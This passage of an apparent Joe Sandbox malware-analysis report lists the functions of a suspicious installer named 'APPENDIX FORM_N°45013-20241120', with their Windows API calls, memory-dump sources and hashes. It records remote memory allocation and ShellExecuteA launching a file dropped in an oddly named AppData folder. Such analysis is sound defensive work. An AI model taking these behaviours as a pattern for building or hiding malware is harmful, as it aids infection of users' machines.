                                                                                                              • Opcode ID: e1baff631acb7ddbb7c96735cc376f86df403abe9831c442b317f501a77cb628
                                                                                                              • Instruction ID: 6e96038cb0222d47830e4b58fd7c52cae377976e6dc55ad69c20d6e03a859a59
                                                                                                              • Opcode Fuzzy Hash: e1baff631acb7ddbb7c96735cc376f86df403abe9831c442b317f501a77cb628
                                                                                                              • Instruction Fuzzy Hash: 0A712371E00229CFDF28DF98C8547ADBBB1FB44305F15806AD816BB281D7789A96DF44
                                                                                                              Function 004065C3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 91970b9c9a707f7a07f11c7f1fa3da56f2db441975c94307291717d81ee5fd9b
                                                                                                              • Instruction ID: e293682df0fe9d8d1d8f36ea8a561890eb7f7220d29e3ea09188f27b28daafc9
                                                                                                              • Opcode Fuzzy Hash: 91970b9c9a707f7a07f11c7f1fa3da56f2db441975c94307291717d81ee5fd9b
                                                                                                              • Instruction Fuzzy Hash: 3A713471E00229CFDF28DF98C8547ADBBB1FB44305F15806AD816BB281D778AA96DF44
                                                                                                              Function 00402F21 Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECD,000000FF,00000000,00000000,00409130,?), ref: 00402F47
                                                                                                              • WriteFile.KERNELBASE(00000000,00412888,?,000000FF,00000000,00412888,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$PointerWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 539440098-0
                                                                                                              • Opcode ID: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
                                                                                                              • Instruction ID: 7786a64bfaa5797d935d651185307358bb9d4d120c35d0410611ad8c6d49fe89
                                                                                                              • Opcode Fuzzy Hash: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
                                                                                                              • Instruction Fuzzy Hash: AD314A7150121AFBDF20DF55ED44A9A3BBCEB04395F20803AF904E61D0D375DA40EBA9
                                                                                                              Function 00401B11 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GlobalFree.KERNEL32(0059B630), ref: 00401B80
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree
                                                                                                              • String ID: Call
                                                                                                              • API String ID: 3394109436-1824292864
                                                                                                              • Opcode ID: f88b08bc8d5f376a5c5648046b026067f98e21d0471fe8a9f7438a1af9f95ecf
                                                                                                              • Instruction ID: 6cbcdb755c73408299f3b34f06e63cd38c4bb374d12efaab4e5d10ed2e92c467
                                                                                                              • Opcode Fuzzy Hash: f88b08bc8d5f376a5c5648046b026067f98e21d0471fe8a9f7438a1af9f95ecf
                                                                                                              • Instruction Fuzzy Hash: 8421C3B6A04200ABDB10EBA4DE89A5F73B4EB44314754853BF101F72D1D77CE8118B5E
                                                                                                              Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                                • Part of subcall function 00405493: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B8
                                                                                                                • Part of subcall function 00405493: CloseHandle.KERNEL32(?), ref: 004054C5
                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 3521207402-0
                                                                                                              • Opcode ID: a7607efde6f1a1c3f748ff42ea39b94a3370956cc0df1f3cfb62896769584e29
                                                                                                              • Instruction ID: 57ae1163c755c1138baaca950cb608618e2418985212f992553cdef3dd7e82e0
                                                                                                              • Opcode Fuzzy Hash: a7607efde6f1a1c3f748ff42ea39b94a3370956cc0df1f3cfb62896769584e29
                                                                                                              • Instruction Fuzzy Hash: 55015771904118ABDF20AFA1D9459AE7BB1EB00345F10853BFA01B51E1C7788A82DBAA
                                                                                                              Function 00405BC7 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,00405E0C,00000000,00000002,?,00000002,?,?,00405E0C,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405BF0
                                                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E0C,?,00405E0C), ref: 00405C11
                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 00405C32
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3677997916-0
                                                                                                              • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                              • Instruction ID: cc704c53ed908c99e7017086828a6fa8a2a616e1108b641e5e4d636184f813ef
                                                                                                              • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                              • Instruction Fuzzy Hash: 2E015A7154420EEFEB228F65EC44AEB3FACEF14354F004436F904A6220D235D964CBA5
                                                                                                              Function 0040243C Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,00000977,00000000,00000022,00000000,?,?), ref: 00402B31
                                                                                                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040246A
                                                                                                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040247D
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402492
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Enum$CloseOpenValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 167947723-0
                                                                                                              • Opcode ID: 0880f7cfda8faa2fb4012732a1283442b1253d14d35797f1991064d50f285c21
                                                                                                              • Instruction ID: 6115cc5812015acb5f7b2ec9ce6142d8c9ddac967d61c7271631ff2633e17099
                                                                                                              • Opcode Fuzzy Hash: 0880f7cfda8faa2fb4012732a1283442b1253d14d35797f1991064d50f285c21
                                                                                                              • Instruction Fuzzy Hash: 87F0D671904200EFEB11DF649E8DE7F7A6CDB40348F10443EF401A61C0D6B85E41D62A
                                                                                                              Function 00401DD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen,?), ref: 00401E1E
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen, xrefs: 00401E09
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExecuteShell
                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen
                                                                                                              • API String ID: 587946157-3057813021
                                                                                                              • Opcode ID: 68b7f21b2f1562d818b67ad27029afae5d9eed81903b3053ccafb51aec8e9597
                                                                                                              • Instruction ID: 5d73ee335cbbab12fdd0ba64fc8bec716ed4f15c46e5d3bc63f2db2428fb96dc
                                                                                                              • Opcode Fuzzy Hash: 68b7f21b2f1562d818b67ad27029afae5d9eed81903b3053ccafb51aec8e9597
                                                                                                              • Instruction Fuzzy Hash: 2CF0C2B2B041006ADB41ABB59E4AE5D3AA4EB41318F240A3AE000F61C2D9BD8842F718
                                                                                                              Function 10002808 Relevance: 3.2, APIs: 2, Instructions: 156memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(00000000), ref: 100028C7
                                                                                                              • GetLastError.KERNEL32 ref: 100029CE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocErrorLastVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 497505419-0
                                                                                                              • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                              • Instruction ID: 979422ec210ed56ae706f471070eab414bbcd449115fcdff0f0e209e3c03d579
                                                                                                              • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                              • Instruction Fuzzy Hash: 015193BA908215DFF710DF64DCC675977B4EB443D4F21842AEA08E722DCF34A9818B54
                                                                                                              Function 004023CA Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,00000977,00000000,00000022,00000000,?,?), ref: 00402B31
                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023FA
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402492
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3677997916-0
                                                                                                              • Opcode ID: e31621f1ab05671a507ecef5b11e961387d53bd79cb52a38b719194ec929815e
                                                                                                              • Instruction ID: 5bdbe45154f933b68e689d5afd50d367b715246d53ed4b5520bfa4a1712170b9
                                                                                                              • Opcode Fuzzy Hash: e31621f1ab05671a507ecef5b11e961387d53bd79cb52a38b719194ec929815e
                                                                                                              • Instruction Fuzzy Hash: B811A371905219EFDF25DF64DA489AF7BB4EF05348F60843FE442B62C0D2B84A41DB6A
                                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                                                                              • Instruction ID: debc39b6c0c0c652093bc86d0143b21aa6e0fee53ad258223395c8adf4e96fc0
                                                                                                              • Opcode Fuzzy Hash: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                                                                              • Instruction Fuzzy Hash: 69012831724210ABE7294B789D04B6A3698FB10315F11853BF851F72F1D6B8DC029B5D
                                                                                                              Function 004022C2 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,00000977,00000000,00000022,00000000,?,?), ref: 00402B31
                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022E1
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004022EA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 849931509-0
                                                                                                              • Opcode ID: c994812294e7505cedf64d0e4002da2d9b7b3913aee5c3cc42b1ec0ac2514cd5
                                                                                                              • Instruction ID: 20fbf32587f58f1f90952d3b6900bfbe77f4a7c0f0f4ca37fe59f02966605123
                                                                                                              • Opcode Fuzzy Hash: c994812294e7505cedf64d0e4002da2d9b7b3913aee5c3cc42b1ec0ac2514cd5
                                                                                                              • Instruction Fuzzy Hash: 93F0C873A00111ABDB10BBF48F4EAAE7264AB40318F10453BF101B71C1D9FC4D01A62D
                                                                                                              Function 004019F1 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
                                                                                                              • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
